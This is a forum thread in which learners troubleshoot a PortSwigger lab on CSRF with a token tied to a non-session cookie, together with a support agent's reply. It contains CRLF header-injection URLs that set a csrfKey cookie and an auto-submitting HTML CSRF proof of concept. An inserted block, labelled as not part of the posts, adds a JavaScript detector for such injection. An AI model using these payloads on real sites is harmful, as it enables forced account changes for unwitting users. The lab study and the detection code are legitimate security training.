The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum


Lab: CSRF where token is tied to non-session cookie solution not working due

Andre | Last updated: May 09, 2023 06:32PM UTC

Hi, I have an issue getting the solution to the lab working. Whenever I try to set the value of the csrf token with

    /?search=test%0d%0aSet-Cookie:%20csrfKey=8TIB6mcBo8vOoLZ1nSPocJae9QLOWMAw%3b%20SameSite=None

the cookie remains unchanged afterwards. Other ways of changing the csrf cookie, like JavaScript

    document.cookie="csrf=8TIB6mcBo8vOoLZ1nSPocJae9QLOWMAw;";

share the same problem and leave the cookie unchanged. I did get a positive response when manually setting the csrf token and cookie in the Repeater function of Burp Suite, so the exploit seems to be working fine, but as my csrf cookie remains unchanged I can't replicate this result within the exploit server.

Ben, PortSwigger Agent | Last updated: May 10, 2023 07:33AM UTC

Hi Andre, are you able to provide screenshots of what your CSRF PoC looks like and what you are, ultimately, entering into the Exploit Server to deliver to the victim so that we can take a look at this for you?

Collin | Last updated: Apr 18, 2024 12:24AM UTC

Hey! I am having the same exact issue. Here is a copy:

    <html>
      <head>
        <title>Change Email Form</title>
      </head>
      <body>
        <form id="change-email-form" action="https://0a0200c203c037d480772181007c006f.web-security-academy.net/my-account/change-email" method="POST">
          <input type="hidden" name="email" value="pwned10@evil-user.net" />
          <input type="hidden" name="csrf" value="yqItjmQ8JxEqx4Hg0Z5OhT9ETtG9MDRC" />
        </form>
        <img src="https://0a0200c203c037d480772181007c006f.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrfKey=PCm78GJGIkdyuWHEEFK4ZXH4kzlxRR9f" onerror="document.forms[0].submit()"></img>
      </body>
    </html>

I clearly see an HTTP response from the server that has the Set-Cookie and is correct, but the cookie is not changed/set in the next response.

Ben, PortSwigger Agent | Last updated: Apr 18, 2024 08:29AM UTC

Hi Collin, if you add 'SameSite=None' to your exploit, does this allow you to successfully deliver the exploit to the victim and solve the lab? i.e.:

    <img src="https://0a0200c203c037d480772181007c006f.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrfKey=PCm78GJGIkdyuWHEEFK4ZXH4kzlxRR9f%3b%20SameSite=None" onerror="document.forms[0].submit()"></img>
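
A defender-side check for the request pattern discussed in this thread, as an added example that is not part of the original posts or of the lab: it decodes each query parameter of a request target and reports any that contain CR/LF followed by header-like lines. The function names, the placeholder host and the sample targets are assumptions constructed for illustration.

```javascript
// Added example: flag request targets whose query parameters decode to CR/LF.
// Sample request targets are constructed; the cookie value is a placeholder.
const SAMPLE_TARGETS = [
  "/?search=test",
  "/?search=test%0d%0aSet-Cookie:%20csrfKey=PLACEHOLDER%3b%20SameSite=None",
  "/?search=test%250d%250aSet-Cookie:%20csrfKey=PLACEHOLDER",
  "/?search=100%25%20off",
];

// Decode repeatedly (bounded) so double-encoded %250d%250a is also caught.
function fullyDecode(value, maxRounds = 3) {
  let current = value;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try {
      next = decodeURIComponent(current);
    } catch (e) {
      break; // malformed escape (e.g. a literal "%"): inspect what we have
    }
    if (next === current) break;
    current = next;
  }
  return current;
}

// Returns one finding per parameter whose decoded value contains CR or LF.
function inspectTarget(target) {
  const url = new URL(target, "https://placeholder.invalid");
  const findings = [];
  for (const [name, value] of url.searchParams) {
    const decoded = fullyDecode(value);
    if (!/[\r\n]/.test(decoded)) continue;
    // Lines after the first line break that look like "Name:" are header lines.
    const headers = decoded
      .split(/\r\n|\r|\n/)
      .slice(1)
      .map((line) => /^([A-Za-z0-9-]+):/.exec(line))
      .filter(Boolean)
      .map((m) => m[1].toLowerCase());
    findings.push({ param: name, injectedHeaders: headers });
  }
  return findings;
}

// Keeps only the targets that produced at least one finding.
function scan(targets) {
  return targets
    .map((t) => ({ target: t, findings: inspectTarget(t) }))
    .filter((r) => r.findings.length > 0);
}
```
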

Collin | Last updated: Apr 18, 2024 11:38PM UTC